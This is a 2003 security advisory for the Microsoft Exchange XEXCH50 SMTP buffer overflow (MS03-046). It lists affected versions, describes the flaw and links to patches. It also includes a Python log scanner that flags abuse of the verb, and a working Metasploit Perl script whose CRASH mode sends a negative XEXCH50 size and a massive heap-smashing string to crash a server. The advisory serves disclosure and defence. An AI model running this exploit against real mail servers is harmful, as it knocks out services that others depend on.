Microsoft Exchange Server Remote Buffer Overflow Vulnerability
Published: 2003-10-15    Updated: 2003-10-22
Severity: High    Threat: remote administrator privileges
Error type: boundary check error    Exploit method: server mode
BUGTRAQ ID:8838 CVE(CAN) ID:CAN-2003-0714
Affected systems:
Microsoft Exchange Server 5.5 SP4
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP3
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP2
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP1
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
Microsoft Exchange Server 2000 SP1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
Microsoft Exchange Server 2000
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2

Detailed description
Microsoft Exchange Server contains a remotely exploitable buffer overflow. Because the XEXCH50 verb is handled incorrectly, a remote, unauthenticated SMTP client can trigger the overflow. On Exchange 2000 this may allow execution of arbitrary code; on Exchange Server 5.5 it may cause a denial of service.
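As an added defender-side example (not part of this advisory and not the Metasploit script reproduced below), the following Python script scans an SMTP session transcript and flags XEXCH50 commands issued before the session completed AUTH, or carrying a negative or implausibly large size argument. Those are the two traits of the abuse the description above names: the verb is reachable without authentication on unpatched servers, and the size argument is what the overflow hinges on. The transcript line format, the two sample sessions, the `MAX_REASONABLE_XEXCH50_SIZE` threshold and the function name `analyze_transcript` are assumptions made for this example.

```python
"""Flag XEXCH50 use that matches the MS03-046 abuse pattern.

Constructed example for this advisory; not part of the original page or of
the Metasploit test script. The transcript format ("<session> <C|S> <text>"
per line), the sample sessions and the size threshold are assumptions.
"""
import re
from dataclasses import dataclass

# Constructed sample transcript: session s1 uses XEXCH50 unauthenticated with a
# negative size, session s2 authenticates first (as a patched server requires)
# and uses a normal size. "C" = client sent, "S" = server replied.
SAMPLE_LOG = """\
s1 S 220 mail.example.test Microsoft ESMTP MAIL Service ready
s1 C HELO X
s1 S 250 OK
s1 C MAIL FROM: DoS
s1 S 250 2.1.0 Sender OK
s1 C RCPT TO: Administrator
s1 S 250 2.1.5 Recipient OK
s1 C XEXCH50 -1 2
s1 S 354 Send binary data
s2 S 220 mail.example.test Microsoft ESMTP MAIL Service ready
s2 C EHLO bridgehead.example.test
s2 S 250 OK
s2 C AUTH NTLM
s2 S 334 challenge
s2 C base64-token
s2 S 235 2.7.0 Authentication successful
s2 C XEXCH50 4096 2
s2 S 354 Send binary data
"""

# Assumed threshold (bytes); tune it to what legitimate server-to-server
# replication traffic on your own site actually shows.
MAX_REASONABLE_XEXCH50_SIZE = 10_000_000

LINE_RE = re.compile(r"^(\S+)\s+([CS])\s+(.*)$")
XEXCH50_RE = re.compile(r"^XEXCH50\s+(-?\d+)\s+(\d+)\s*$", re.IGNORECASE)


@dataclass
class Finding:
    session: str
    reason: str
    command: str


def analyze_transcript(text):
    """Return Findings for XEXCH50 commands that look like MS03-046 abuse."""
    authenticated = {}  # session id -> True once the server answered 235
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # ignore lines that are not in the assumed format
        sess, direction, payload = m.groups()
        if direction == "S":
            # RFC 4954: reply code 235 means the AUTH exchange succeeded.
            if payload.startswith("235"):
                authenticated[sess] = True
            continue
        x = XEXCH50_RE.match(payload)
        if not x:
            continue
        size = int(x.group(1))
        if not authenticated.get(sess, False):
            findings.append(Finding(sess, "XEXCH50 before authentication", payload))
        if size < 0:
            findings.append(Finding(sess, "negative XEXCH50 size argument", payload))
        elif size > MAX_REASONABLE_XEXCH50_SIZE:
            findings.append(Finding(sess, "oversized XEXCH50 size argument", payload))
    return findings


if __name__ == "__main__":
    for f in analyze_transcript(SAMPLE_LOG):
        print(f"[{f.session}] {f.reason}: {f.command}")
```

Run against the constructed sample, the script reports two findings, both for session s1 (unauthenticated use and a negative size); session s2 produces none because it authenticated first and used a plausible size. The authentication check matters more than the size check: a patched server refuses XEXCH50 until NTLM authentication completes, so any unauthenticated use of the verb indicates either an unpatched server or a client probing for one.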
Test code
#!/usr/bin/perl -w
##################
##
# ms03-046.pl - hdm[at]metasploit.com
##
use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();

sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }
    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close ($s);
    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res =~ /authentication/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }
    print "[*] This system is vulnerable: $host:$port\n";
    exit(0);
}

sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }
    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;
    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res =~ /authentication/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }
    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);
    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);
    exit(0);
}

sub usage
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);
}

sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);
    my $r = <$s>;
    return undef if !$r;
    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }
    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;
    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;
    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;
    return($s);
}
Solution
The vendor has released patches:
Microsoft Exchange Server 2000 SP3:
Microsoft Patch Security Update for Exchange 2000 (KB829436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=7BAF5394-1B4E-4937-A570-9F232AE49F01&displaylang=en
Microsoft Exchange Server 5.5 SP4:
Microsoft Patch Security Update for Exchange 5.5 (KB829436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=A9E872EA-54B0-4179-8AE9-5648BFB46459&displaylang=en
Related information
CA-2003-27: Multiple Vulnerabilities in Microsoft Windows and Exchange
http://www.cert.org/advisories/CA-2003-27.html
Microsoft Security Bulletin MS03-046
http://www.microsoft.com/technet/security/bulletin/MS03-046.asp